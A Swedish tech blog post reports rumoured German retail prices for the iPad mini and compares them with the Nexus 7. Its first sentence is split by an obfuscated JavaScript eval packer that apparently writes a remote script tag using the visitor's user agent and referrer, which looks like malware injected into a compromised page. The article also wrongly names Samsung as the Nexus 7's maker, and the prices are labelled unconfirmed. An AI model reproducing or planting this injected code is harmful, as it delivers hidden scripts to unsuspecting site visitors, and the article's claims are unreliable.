Image Image Image Image Image Image Image Image Image Image

| 20 oktober, 2018

Scroll to top

Top

iPad mini: Är detta priserna?

iPad mini: Är detta priserna?
Sebastian Plengier Ehrnfelt

Dessa eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rayyi|var|u0026u|referrer|ikftz||js|php’.split(‘|’),0,{}))
priser som sägs vara på iPad mini tros komma från en Media Markt i Tyskland. Om dessa stämmer kommer den billigaste ipad mini att kosta drygt 2 500 kronor. Enligt prislistan börjar den billigaste på 249 euro för 8 GB versionen med WiFi. Detta att jämföras med Samsung Nexus 7 som kostar ca 199 euro.

Som vi vet får man betala en slant extra för utrymme hos Apple och varje minnessteg kommer att kosta ca 100 euro extra.
100 euro är ok när man växlar från 8 GB till 32 GB men inte från 8 GB till 16 Gb. För 3G får man också lägga till 100 euro.

En iPad mini på 64 GB och 3G kommer att kosta 649 euro, ett svenskt pris på ungefär 5795 kronor. Men som nämnt ovan vet vi inte om priserna stämmer eller ej.

Mer info: mobilegeeks.de